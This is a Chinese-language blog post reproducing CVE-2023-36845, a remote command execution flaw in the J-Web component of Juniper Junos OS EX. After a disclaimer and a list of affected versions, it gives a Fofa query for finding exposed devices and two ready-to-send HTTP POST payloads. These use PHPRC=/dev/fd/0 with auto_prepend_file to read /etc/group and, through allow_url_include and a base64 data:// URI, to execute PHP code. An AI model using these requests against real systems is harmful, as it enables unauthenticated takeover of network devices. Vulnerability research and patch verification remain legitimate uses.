Juniper Networks Junos OS EX远程命令执行漏洞(CVE-2023-36845)

最新推荐文章于 2024-04-16 11:19:22 发布
最新推荐文章于 2024-04-16 11:19:22 发布
阅读量871 收藏
点赞数
分类专栏: 漏洞复现 文章标签: 网络 web安全 网络安全 安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44304678/article/details/134274956
版权

Juniper Networks Junos OS EX远程命令执行漏洞(CVE-2023-36845)

免责声明

仅用于技术交流,目的是向相关安全人员展示漏洞利用方式,以便更好地提高网络安全意识和技术水平。
任何人不得利用该文章进行非法攻击和侵犯他人的隐私和财产权利。一旦发生任何违法行为,责任自负。
该文章仅用于授权测试,任何未经授权的测试均属于非法行为。请在法律许可范围内使用。
作者对使用该文章导致的任何直接或间接损失不承担任何责任。使用此文章的风险由使用者自行承担。

漏洞描述

Juniper Networks Junos OS EX是美国瞻博网络(Juniper Networks)公司的一套专用于该公司的硬件设备的网络操作系统。该操作系统提供了安全编程接口和Junos SDK。Juniper Networks Junos OS EX存在安全漏洞,该漏洞源于J-Web模块存在PHP外部变量修改漏洞。允许未经身份验证的网络攻击者控制某些重要的环境变量。攻击者利用特制请求可以修改某个PHP环境变量,造成部分完整性损失,这可能允许链接到其他漏洞。

漏洞影响

Juniper Networks Junos OS: 所有版本早于21.4R3-S5;22.1版本早于22.1R3-S4;22.2版本早于22.2R3-S2;22.3版本早于22.3R2-S2、22.3R3-S1;22.4版本早于22.4R2-S1、22.4R3;23.2版本早于23.2R1-S1、23.2R2。

漏洞危害

执行操作系统命令,获取服务器权限,接管服务器

网络测绘

Fofa: body=“J-web” || title=“Juniper Web Device Manager”

在这里插入图片描述在这里插入图片描述

漏洞复现

1. 构造poc

POST /?PHPRC=/dev/fd/0 HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 30

auto_prepend_file="/etc/group"

2. 查看文件

在这里插入图片描述

3. 执行命令

POST /?PHPRC=/dev/fd/0 HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 90

allow_url_include=1
auto_prepend_file="data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8+"

在这里插入图片描述

小胡yhu
关注
专栏目录
CVE-2023-36845Juniper Networks Junos OS EX远程命令执行漏洞
薛定谔嘚喵博客
10-09 987
Juniper Networks Junos OS EX存在安全漏洞,该漏洞源于J-Web模块存在PHP外部变量修改漏洞。允许未经身份验证的网络攻击者控制某些重要的环境变量。攻击者利用特制请求可以修改某个PHP环境变量,造成部分完整性损失,这可能允许链接到其他漏洞
Junos webauth_operation.php 文件上传漏洞复现(CVE-2023-36844)
0xSec
11-28 1129
Junos webauth_operation.php接口处存在文件上传漏洞,未经身份认证的攻击者可利用Junos操作系统的J-Web服务/webauth_operation.php路由上传phpwebshell,通过?PHPRC参数进行包含,进入控制整个web服务器。
Juniper_RCE漏洞_CVE-2023-36845漏洞复现(附EXP)
m0_64366018的博客
01-15 923
执行命令,先base64编码。
漏洞复现--Juniper Networks Junos OS EX远程命令执行漏洞(CVE-2023-36845)
qq_53003652的博客
10-08 621
文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行承担!
【复现】Juniper Networks Junos OS EX-RCE漏洞_07
fushuang333的博客
01-03 662
Junos OS 是支持瞻博网络广泛的物理和虚拟网络安全产品组合的单一操作系统。具体看官网。通过提交恶意构造的参数破坏命令语句结构,从而达到执行恶意代码的目的。
juniper入门--实验一:EX系列设备升级OS
学无止境
03-11 2647
1、os升级: 方法一: 开启ssh/FTP 连接某个端口上并配置IP地址(主机与交换机端口配置一个网段) 将版本文件jinstall-ex-4200-15.1R7.9-domestic-signed.tgz 上传到某个文件夹(/var/tmp) request system software add /var/tmp/jinstall-ex-4200-15.1R7.9-domest...
速修复!Juniper Junos OS 漏洞使设备易受攻击
smellycat000的专栏
08-21 577
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士网络硬件公司 Juniper Networks 发布“周期外”安全更新,修复位于 Junos OS的 J-Web 组件中的多个漏洞。攻击者可组合利用这些漏洞在易受攻击设备上实现远程代码执行。这四个漏洞的CVSS评分均为 9.8,属于“严重”漏洞,影响 SRX 和 EX 序列上 Junos OS 所有版本。2023年8月17日,Juniper 公司...
Juniper NETWORKS JUNOS基本操作 中文版
03-25
Juniper NETWORKS JUNOS基本操作 第一章 Juniper Juniper 公司及认证考试 1.1 Juniper Networks公司介绍 1.2 Juniper 与 Cisco Cisco 网络产品介绍及对比 1.3 Juniper JUNOS 方向认证 第二章 JUNOS软件介绍 2.1...
Juniper JUNOS-EX交换机配置手册.pdf
10-11
Juniper JUNOS-EX交换机配置手册 本文档提供了 Juniper JUNOS-EX 交换机的配置手册,旨在帮助网络管理员和技术人员快速掌握交换机的配置和操作。下面是本手册的详细知识点: 1. 交换机基础知识 * 认识 JUNIPER ...
juniper srx210H 防火墙固件 固件版本:junos-srxsme-12.1X46-D77-domestic.tgz
06-09
解压后文件:junos-srxsme-12.1X46-D77-domestic.tgz size:(142.79MB) Checksums MD5 : f0a1b86c171fa858ef03b03ebdce8c27 SHA1 : 0eefebe1b4b3d6d88b41c7d3c00d605edd0b958d SHA256 : 25b169aca054b9312e9694b3004c...
上万台 Juniper 设备易受未认证RCE漏洞攻击
smellycat000的专栏
09-19 335
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士约1.2万台 Juniper SRX 防火墙和EX 交换机易受无文件远程代码执行漏洞影响,可导致攻击者在无需认证的情况下利用它。8月份,Juniper 披露了多个“PHP环境变量操纵” (CVE-2023-36844/CVE-2023-36845) 和 “关键函数认证缺失” (CVE-2023-36836/CVE-2023-36847) 漏洞,它...
网络安全日报 2023年12月11日
Galaxy_0的博客
12-11 1159
网络安全行业产业以来,随即新增加了几十个网络安全行业岗位︰网络安全专家、网络安全分析师、安全咨询师、网络安全工程师、安全架构师、安全运维工程师、渗透工程师、信息安全管理员、数据安全工程师、网络安全运营工程师、网络安全应急响应工程师、数据鉴定师、网络安全产品经理、网络安全服务工程师、网络安全培训师、网络安全审计员、威胁情报分析工程师、灾难恢复专业人员、实战攻防专业人员…网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
CloudPanel RCE漏洞复现(CVE-2023-35885)
0xSec
01-19 928
由于2.3.1 之前的 CloudPanel 具有不安全的文件管理器 cookie 身份验证。未经身份验证的攻击者可以利用此问题在服务器上创建任意文件,创建PHP后门文件可远程代码执行,并且获取服务器权限。
漏洞复现】CloudPanel makefile接口远程命令执行漏洞(CVE-2023-35885)
做自己喜欢的事,并将其发挥到极致!
01-22 1152
CloudPanel是CloudPanel开源的一款免费软件,是一个基于 Web 的控制面板或管理界面,旨在简化云托管环境的管理。它提供了一个集中式平台,用于管理云基础架构的各个方面,包括 (VM)、存储、网络和应用程序、配置和管理服务器。CloudPanel 2.3.1之前版本存在安全漏洞,该漏洞源于具有不安全的文件管理器cookie身份验证。
记src一处Juniper远程命令执行
hackzkaq的博客
10-26 183
修改传参方式,并按照上述payload在路径后面拼接上”?PHPRC=/dev/fd/0”,请求体中加入auto_prepend_file参数。免费领取安全学习资料包!(私聊进群一起学习,共同进步)
网络靶场实战-Juniper SRX远程代码执行漏洞复现分析
最新发布
蛇矛实验室
04-16 1111
首先是未授权文件上传漏洞,我们可以通过poc快速定位到webauth_operation.php文件中,php使用了includes/sajax.php文件,并调用了sajax_init()和sajax_handle_client_request()函数。在sajax_handle_client_request函数的末尾,我们可以看到"$internal_functions"变量,通过打印变量中user的值,我们可以获取150个单独的功能,其中对于我们比较重要的就是文件上传和写入的功能了。
CVE-2023-35843NocoDB 任意文件读取漏洞(CVE-2023-35843)
m0_46317063的博客
06-29 644
cve-2023-35843
Juniper Junos OS 高危漏洞影响企业网络设备
smellycat000的专栏
10-31 698
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士Juniper Networks设备中存在多个高危漏洞,其中一些可用于实现代码执行。Octagon Networks公司的研究员 Paulos Yibelo指出,其中最主要的漏洞是位于 Junos OS J-Web 组件中的远程预认证PHP文档文件反序列化漏洞CVE-2022-22241,CVSS评分8.1)。Yibelo 在报告中提到,“未认...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值